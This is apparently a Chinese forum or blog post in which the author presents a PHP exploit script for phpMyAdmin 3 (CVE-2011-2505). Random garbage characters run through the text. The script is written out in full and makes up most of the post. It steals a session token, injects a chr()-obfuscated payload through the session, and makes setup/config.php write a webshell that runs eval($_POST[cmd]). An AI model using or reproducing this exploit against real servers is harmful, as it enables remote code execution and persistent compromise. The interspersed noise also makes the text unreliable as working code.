最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。/ f# }1 P# R: u$ v2 ?5 V
1 w# B$ o3 r- T3 S2 ^4 V1 C昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
, V) Q8 v0 ?% p! [: @2 n2 L2 }
: a/ B, ^* \6 u8 N首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
/ C0 {4 h/ x2 {* p2 m( V1 ` V( i一是session.auto_start = 1;) n& X* {% I1 S! G3 r0 A& p
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。) @6 W& o' l) x/ E" c6 K( \$ _, N
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
4 _1 c6 q8 Q1 |5 P. k; S
; r K+ h( y- k1 N- b5 n* _! ~在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
4 `' s8 j: F; i9 r2 F- P- B2 ~* P3 p8 _- M* v
于是写了这个php版本的exp,代码如下:9 Y9 Y5 a. h# N7 ]: s
) ~- ?# l; u3 i4 `7 P. V( G5 r#!/usr/bin/php/ g- D( H- d4 \! b4 p1 R
<?php
, j y2 T. J2 W+ s# hprint_r('
& [7 a9 D1 P; g/ ]. N! E+---------------------------------------------------------------------------+* k: I! W+ D* N6 d& m
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
: Q; M/ S6 B. o( [$ o7 mby oldjun(www.oldjun.com)
j5 M; N7 [+ |* Dwelcome to www.t00ls.net
5 e" ` r9 z: Z0 W4 Pmail: oldjun@gmail.com* b* z4 J R6 c% r9 Y/ x" h7 E
Assigned CVE id: CVE-2011-2505
0 [; _1 d% ?0 A, M B* ~+ Y8 R+---------------------------------------------------------------------------+
" p6 g9 G) h1 J! _( D- X ^');
, p7 m! G& [/ ?0 a0 P' d
% Z V8 X6 v- ^: |/**
5 \% P2 N6 p! L+ A * working when the directory:"config" exists and is writeable.
# b" a1 n1 G5 T( z2 I**/
0 c* G) g5 R# _8 z 9 l" Y3 n/ x g% ^1 `1 G% w2 n
if ($argc < 3) {
( n" {/ n1 k( [7 N5 E% q% Z; ` print_r('8 {+ s. O, x2 J- }% S3 y0 D5 P$ V
+---------------------------------------------------------------------------+
! s3 k v% F3 r0 QUsage: php '.$argv[0].' host path
' }/ f2 O# h3 R* u% s8 j. khost: target server (ip/hostname)
7 V% `, _1 T, @2 b Spath: path to pma3
5 D, _* v: c y9 U8 Z) k& OExample:
: r# _- a3 A6 x0 n, Gphp '.$argv[0].' localhost /pma/& Y9 j. a- e- V S
+---------------------------------------------------------------------------+* i' G( M5 M" k4 E5 M: ?: Y$ h3 G
');
. `1 z0 D8 {" a: c3 N: m exit;( v3 z( p2 E' _2 t% N2 ~# _* O
}9 R- H1 ~. _. t7 L
/ W1 U) t1 ^- O) b, B8 F$host = $argv[1];
+ ^5 z8 g3 m+ [' @& }5 l0 Y$path = $argv[2];
2 g! b& T, k: D2 ]% w5 }' n( R7 I5 n3 x% e6 B# H; V7 a( T5 K
/**) G* y: \5 F: z
* Try to determine if the directory:"config" exists
7 k8 ^9 q1 k1 s0 _1 @4 Y**/. r' U: E, \3 x, V7 r4 \
echo "[+] Try to determine if the directory:config exists....\n";9 C4 f0 E( H- Z# C- x7 M
$returnstr=php_request('config/'); E8 U/ x& m: r
if(strpos($returnstr,'404')){
2 E! O& ], j5 v9 u; o5 R! D0 I exit("[-] Exploit Failed! The directory:config do not exists!\n");
3 R5 r* T+ M8 `& n/ v& I8 P0 `) z}
8 Y+ D4 z) r$ a+ I. ?* v4 x" t, N3 C( E) m) o" Q, F+ v; ?
/**
@ N' g0 D" N1 x! x6 w" g * Try to get token and sessionid/ T% r0 F4 S3 p& G8 t
**/
3 w, `/ R F- x: A- d ^; |" p4 Wecho "[+] Try to get token and sessionid....\n";
8 N* w( @7 t) K, g* [9 ?/ P9 B$result=php_request('index.php');0 x& W2 d0 Z% [! l5 i* G& K. a7 i+ O* K) I
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
) ]! C6 ~+ S; d: F8 u. c$token=$resp[3];
. b1 }4 Y# f( g. H. g# f4 j$sessionid=$resp[1];
# H E; Q; Q- T, gif($token && $sessionid){6 I- M7 A, w" C, s; U! \. r6 l/ c
echo "[+] token token\n";2 H0 |% c/ ?, H; `1 J1 E: f
echo "[+] Session ID sessionid\n";0 p# ~. ~# _- j+ I* r
}else{3 Y7 i: m! p) k! W/ n7 M
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
2 g1 n- \% z; J' b}
! s/ ^3 V) V$ m' E0 U. u) l7 [0 F$ Y0 K, G2 X( ~: ^, s0 H" n7 @6 C
/**, U. d/ G5 H' g
* Try to insert shell into session! K5 H$ D2 v8 @; {: l; k8 E
**/2 Q2 D# _# }3 w3 w% L8 N! n
echo "[+] Try to insert shell into session....\n";! `- W4 O4 i0 h7 F# i3 T
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.% U9 R- v ?# F
; D) `+ h; A* r& q1 S( z1 S& Z
/**
- `0 ^+ O D( O1 s( }; O- p * Try to create webshell
; f0 Y* p& H3 y/ V' L9 e**/* y" L0 q9 I* |: ]
echo "[+] Try to create webshell....\n";
y0 N% Z' s! C) `6 u/ h9 ]php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);+ D3 |$ A# ^3 F0 `9 D8 I' ^
/**
! a; L5 J( I- o, t1 P: s5 B2 } * Try to check if the webshell was created successfully. B. k' u9 _) H2 o
**/: c$ b) G b% w }
echo "[+] Try to check if the webshell was created successfully....\n";) }% f3 e4 I7 ?( f1 D9 k) l
$content=php_request('config/config.inc.php');
6 z! t! u( r9 Z" H" cif(strpos($content,'t00ls')){8 ?6 v8 s% I. g
echo "[+] Congratulations! Expoilt successfully....\n";
- O& ?+ V A6 D+ I' Y& z echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";: s! ?2 j. X9 A" H/ Y
}else{
+ @( J9 \9 |. g/ d1 O exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");' l6 o& O# }1 X, U
}1 ~) ?( s* g6 y r( e3 d
6 p4 y! z! u4 N) j( f2 Q D! Z2 Pfunction php_request($url,$data='',$cookie=''){0 I6 Q' P5 L: O- u/ }( s b
global $host, $path;
8 _$ Q' y' `% E" d7 s; m
- i0 r& G- i% t* _- X2 A8 L+ h $method=$data?'POST':'GET';
" O4 u9 X2 D L+ ^% ]+ x8 p
" X# N' i* a( N. Y: `% | $packet = $method." ".$path.$url." HTTP/1.1\r\n";& _5 s3 b7 L$ s/ |9 \- F
$packet .= "Accept: */*\r\n";' z$ P( I6 l4 ~& o+ l7 C9 {
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";$ [5 A# h6 J1 |- Z/ G: E# X
$packet .= "Host: $host\r\n";
" s d0 C3 O d( X4 }$ j! R A- n $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";( u( a( @( }3 q
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";# R2 G _# n- ]- U
$packet .= $cookie?"Cookie: $cookie\r\n":"";9 ]* r+ H$ l' ~
$packet .= "Connection: Close\r\n\r\n";
8 B# s9 \/ P4 Z$ W8 R $packet .= $data?$data:"";
: i: S }/ G0 n6 V* M+ o2 t' p4 c" ]
$fp = fsockopen(gethostbyname($host), 80);0 L, S* y/ T j2 ?$ u. y0 C! i
if (!$fp) {2 f. q1 H$ T; @# x6 y0 U* Z$ b k
echo 'No response from '.$host; die;
$ S; ]5 N" |/ ~ G! B5 m }
2 h. g' B t) H% x6 B fputs($fp, $packet);. @9 N1 k' R" M, s7 V
$ N9 W- e s5 J( {
$resp = '';
5 u8 o$ _5 w9 J" a) I
7 @% r; t6 G( \( _* h% Y b while ($fp && !feof($fp))
" E' _0 H$ ~' Y2 M+ i g2 I/ v $resp .= fread($fp, 1024);" }" c. R! C0 @
( M4 v# {; j2 M2 P/ t return $resp; W4 M% [% k& S X5 R) ]$ g: ~
}+ Y" F4 f& H3 k) Q% ^
' q$ |3 r! b1 _% A: X1 p
?> * a9 `; q* r& k3 U6 w. N
. |